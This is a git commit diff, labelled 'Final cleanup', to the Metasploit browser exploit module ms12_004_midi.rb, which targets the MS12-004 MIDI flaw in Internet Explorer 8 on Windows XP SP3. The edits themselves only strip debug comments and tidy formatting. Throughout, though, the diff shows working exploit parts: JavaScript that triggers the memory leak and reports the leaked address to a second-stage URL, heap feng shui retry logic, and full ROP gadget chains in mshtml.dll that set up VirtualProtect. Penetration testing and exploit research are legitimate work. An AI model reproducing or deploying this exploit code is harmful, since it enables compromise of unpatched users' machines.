Final cleanup

modules/exploits/windows/browser/ms12_004_midi.rb

@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[
 						false, "MSHTML Build Version", '',
 						[
-							'',
+							'',               #Default (no leaky leaky)
 							'8.0.6001.18702', #newly installed Win XP SP3 non patched
 							'8.0.6001.19120'  #fully patched before KB2598479 - been the same at least since Sep 2011
 						]
@@ -225,7 +225,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		m << [tc.length].pack('N')
 		m << tc
 
-
 		#midi_name = "test_case.mid"
 		midi_name = rand_text_alpha(5) + ".mid"
 
@@ -491,30 +490,23 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	# Redoing the feng shui if fails makes it reliable
 	def js_trigger_fn_leak(my_target)
-
 		js_trigger = ""
-
 		if my_target.name == 'IE 8 on Windows XP SP3'
 			js_trigger = <<-JSTRIGGER
 			function trigger(){
-				//alert('trying the trigger');
 				var k = 999;
 				while (k > 0) {
 					if (typeof(clones[k].w1) == "string") {
-						//alert('uaaa');
 						var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
-						//alert(leak);
 						document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
 						return;
 					}
 					k = k - 2;
 				}
-				//alert('retry');
 				feng_shui();
 				document.audio.Play();
 			}
 			JSTRIGGER
-
 		end
 
 		return js_trigger
@@ -569,7 +561,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				0x4b601,    # RETN (ROP NOP) [mshtml.dll]
 				0x33fbc6,   # POP EAX # RETN [mshtml.dll] 
 				:nop,
-				0x52c718,   # PUSHAD # RETN [mshtml.dll]
+				0x52c718    # PUSHAD # RETN [mshtml.dll]
 			]
 
 		when 0xbf190
@@ -584,27 +576,27 @@ class Metasploit3 < Msf::Exploit::Remote
 				:junk,
 				:junk,
 				:junk,
-				0x1318,     #0x63581318,  # ptr to &VirtualProtect() [IAT mshtml.dll]
-				0x48b440,   #0x63a0b440,  # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
-				0x3dc745,   #0x6395c745,  # POP ESI # RETN [mshtml.dll]
-				:neg,       #0xffffffff
-				0x2fb18b,   #0x6387b18b,  # INC ESI # RETN [mshtml.dll]
-				0x35190d,   #0x638d190d,  # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
-				0x4aada7,   #0x63a2ada7,  # POP EBP # RETN [mshtml.dll]
-				:junk,      #Compensates RETN
-				:junk,      #Compensates RETN
-				0x1ffc54,   #0x6377fc54,  # & jmp esp [mshtml.dll]
-				0x4498a7,   #0x639c98a7,  # POP EBX # RETN [mshtml.dll]
+				0x1318,     # ptr to &VirtualProtect() [IAT mshtml.dll]
+				0x48b440,   # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
+				0x3dc745,   # POP ESI # RETN [mshtml.dll]
+				:neg,       # 0xffffffff
+				0x2fb18b,   # INC ESI # RETN [mshtml.dll]
+				0x35190d,   # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
+				0x4aada7,   #  POP EBP # RETN [mshtml.dll]
+				:junk,      # Compensates RETN
+				:junk,      # Compensates RETN
+				0x1ffc54,   # & jmp esp [mshtml.dll]
+				0x4498a7,   # POP EBX # RETN [mshtml.dll]
 				:ebx,       # 0x00000800: 0x00000201-> ebx
-				0x24cce4,   #0x637ccce4,    # POP EDX # RETN [mshtml.dll]
+				0x24cce4,   # POP EDX # RETN [mshtml.dll]
 				:edx,       # 0x00000040-> edx
-				0x158306,   #0x636d8306,  # POP ECX # RETN [mshtml.dll]
-				0x535098,   #0x63ab5098,  # &Writable location [mshtml.dll]
-				0x1cf217,   #0x6374f217,  # POP EDI # RETN [mshtml.dll]
-				0xa0001,    #0x63620001,  # RETN (ROP NOP) [mshtml.dll]
-				0x349f9b,   #0x638c9f9b,  # POP EAX # RETN [mshtml.dll]
-				:nop,       #nop
-				0x2afbe8   #0x6382fbe8,  # PUSHAD # RETN [mshtml.dll]
+				0x158306,   # POP ECX # RETN [mshtml.dll]
+				0x535098,   # &Writable location [mshtml.dll]
+				0x1cf217,   # POP EDI # RETN [mshtml.dll]
+				0xa0001,    # RETN (ROP NOP) [mshtml.dll]
+				0x349f9b,   # POP EAX # RETN [mshtml.dll]
+				:nop,
+				0x2afbe8    # PUSHAD # RETN [mshtml.dll]
 			]
 		end